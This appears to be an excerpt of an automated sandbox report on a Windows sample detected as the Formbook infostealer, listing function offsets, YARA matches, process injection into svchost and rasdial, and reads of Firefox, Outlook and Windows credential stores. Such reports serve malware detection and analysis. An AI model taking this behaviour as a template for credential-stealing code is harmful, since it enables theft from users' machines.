            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D8E4F66_2_04D8E4F6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D924466_2_04D92446
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D844206_2_04D84420
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04DA05916_2_04DA0591
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CE05356_2_04CE0535
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CFC6E06_2_04CFC6E0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CDC7C06_2_04CDC7C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D047506_2_04D04750
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CE07706_2_04CE0770
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D720006_2_04D72000
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D981CC6_2_04D981CC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04DA01AA6_2_04DA01AA
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D941A26_2_04D941A2
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D681586_2_04D68158
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CD01006_2_04CD0100
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D7A1186_2_04D7A118
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D602C06_2_04D602C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D802746_2_04D80274
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04DA03E66_2_04DA03E6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CEE3F06_2_04CEE3F0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D9A3526_2_04D9A352
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CD0CF26_2_04CD0CF2
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D80CB56_2_04D80CB5
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CE0C006_2_04CE0C00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CDADE06_2_04CDADE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CF8DBF6_2_04CF8DBF
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D7CD1F6_2_04D7CD1F
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CEAD006_2_04CEAD00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D9EEDB6_2_04D9EEDB
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D9CE936_2_04D9CE93
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CF2E906_2_04CF2E90
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CE0E596_2_04CE0E59
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D9EE266_2_04D9EE26
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CD2FC86_2_04CD2FC8
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D5EFA06_2_04D5EFA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D54F406_2_04D54F40
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D00F306_2_04D00F30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D82F306_2_04D82F30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D22F286_2_04D22F28
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D0E8F06_2_04D0E8F0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CC68B86_2_04CC68B8
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CE28406_2_04CE2840
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CEA8406_2_04CEA840
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CE29A06_2_04CE29A0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04DAA9A66_2_04DAA9A6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CF69626_2_04CF6962
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CDEA806_2_04CDEA80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D96BD76_2_04D96BD7
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D9AB406_2_04D9AB40
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CD14606_2_04CD1460
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D9F43F6_2_04D9F43F
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D7D5B06_2_04D7D5B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D975716_2_04D97571
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D916CC6_2_04D916CC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D9F7B06_2_04D9F7B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CE70C06_2_04CE70C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D8F0CC6_2_04D8F0CC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D970E96_2_04D970E9
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D9F0E06_2_04D9F0E0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CEB1B06_2_04CEB1B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04DAB16B6_2_04DAB16B
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D1516C6_2_04D1516C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CCF1726_2_04CCF172
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CFB2C06_2_04CFB2C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D812ED6_2_04D812ED
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CFD2F06_2_04CFD2F0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CE52A06_2_04CE52A0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D2739A6_2_04D2739A
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CCD34C6_2_04CCD34C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D9132D6_2_04D9132D
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D9FCF26_2_04D9FCF2
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D59C326_2_04D59C32
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CFFDC06_2_04CFFDC0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D91D5A6_2_04D91D5A
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CE3D406_2_04CE3D40
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D97D736_2_04D97D73
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CE9EB06_2_04CE9EB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CA3FD26_2_04CA3FD2
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CA3FD56_2_04CA3FD5
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CE1F926_2_04CE1F92
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D9FFB16_2_04D9FFB1
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D9FF096_2_04D9FF09
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CE38E06_2_04CE38E0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D4D8006_2_04D4D800
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CE99506_2_04CE9950
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CFB9506_2_04CFB950
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D759106_2_04D75910
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D8DAC66_2_04D8DAC6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D25AA06_2_04D25AA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D7DAAC6_2_04D7DAAC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D81AA36_2_04D81AA3
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D9FA496_2_04D9FA49
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D97A466_2_04D97A46
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D53A6C6_2_04D53A6C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D55BF06_2_04D55BF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D1DBF96_2_04D1DBF9
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04CFFB806_2_04CFFB80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D9FB766_2_04D9FB76
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02BC1BF06_2_02BC1BF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02BBCB706_2_02BBCB70
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02BBCB686_2_02BBCB68
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02BBAE106_2_02BBAE10
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02BBCD906_2_02BBCD90
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02BC52506_2_02BC5250
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02BDB6306_2_02BDB630
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02BC34306_2_02BC3430
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B8E70C6_2_04B8E70C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B8D7786_2_04B8D778
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B8E2586_2_04B8E258
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B8E3736_2_04B8E373
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03187E54 appears 107 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0312B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03175130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 031BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 031AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 04D4EA12 appears 86 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 04D15130 appears 58 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 04CCB970 appears 262 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 04D27E54 appears 99 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 04D5F290 appears 103 times
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: String function: 0008F9F2 appears 31 times
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: String function: 00090A30 appears 46 times
            Source: 031215-Revised-01.exe, 00000000.00000003.1720855921.0000000003DB3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 031215-Revised-01.exe
            Source: 031215-Revised-01.exe, 00000000.00000003.1722290106.0000000003F5D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 031215-Revised-01.exe
            Source: 031215-Revised-01.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.2680000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.2680000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2082509360.0000000003450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3519693781.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3521236665.00000000058C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3519634972.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3518320183.0000000002BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2081915749.0000000002680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3519666163.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2082567051.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@10/9
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000E37B5 GetLastError,FormatMessageW,0_2_000E37B5
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000D10BF AdjustTokenPrivileges,CloseHandle,0_2_000D10BF
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000D16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_000D16C3
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000E51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_000E51CD
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000FA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_000FA67C
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000E648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_000E648E
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000742A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_000742A2
            Source: C:\Users\user\Desktop\031215-Revised-01.exeFile created: C:\Users\user\AppData\Local\Temp\autD41E.tmpJump to behavior
            Source: 031215-Revised-01.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\031215-Revised-01.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: rasdial.exe, 00000006.00000003.2268324117.00000000030D1000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3518674647.00000000030B0000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3518674647.00000000030D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 031215-Revised-01.exeReversingLabs: Detection: 36%
            Source: unknownProcess created: C:\Users\user\Desktop\031215-Revised-01.exe "C:\Users\user\Desktop\031215-Revised-01.exe"
            Source: C:\Users\user\Desktop\031215-Revised-01.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\031215-Revised-01.exe"
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"
            Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\031215-Revised-01.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\031215-Revised-01.exe"Jump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\031215-Revised-01.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\031215-Revised-01.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\031215-Revised-01.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\031215-Revised-01.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\031215-Revised-01.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\031215-Revised-01.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\031215-Revised-01.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\031215-Revised-01.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\031215-Revised-01.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\031215-Revised-01.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\031215-Revised-01.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\031215-Revised-01.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: 031215-Revised-01.exeStatic file information: File size 1276416 > 1048576
            Source: 031215-Revised-01.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: 031215-Revised-01.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: 031215-Revised-01.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: 031215-Revised-01.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: 031215-Revised-01.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: 031215-Revised-01.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: 031215-Revised-01.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EsAzcOtjoknfjP.exe, 00000005.00000000.2005677957.0000000000E6E000.00000002.00000001.01000000.00000005.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3518322443.0000000000E6E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: 031215-Revised-01.exe, 00000000.00000003.1722823360.0000000003C90000.00000004.00001000.00020000.00000000.sdmp, 031215-Revised-01.exe, 00000000.00000003.1722915545.0000000003E30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2082183945.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2082183945.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1988264007.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1990149882.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3519880403.0000000004E3E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3519880403.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2084604112.0000000004AF7000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2082199541.000000000494A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdb source: svchost.exe, 00000001.00000003.2048949385.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2082015604.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000005.00000002.3519140397.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000005.00000003.2022839574.00000000011CB000.00000004.00000001.00020000.00000000.sdmp
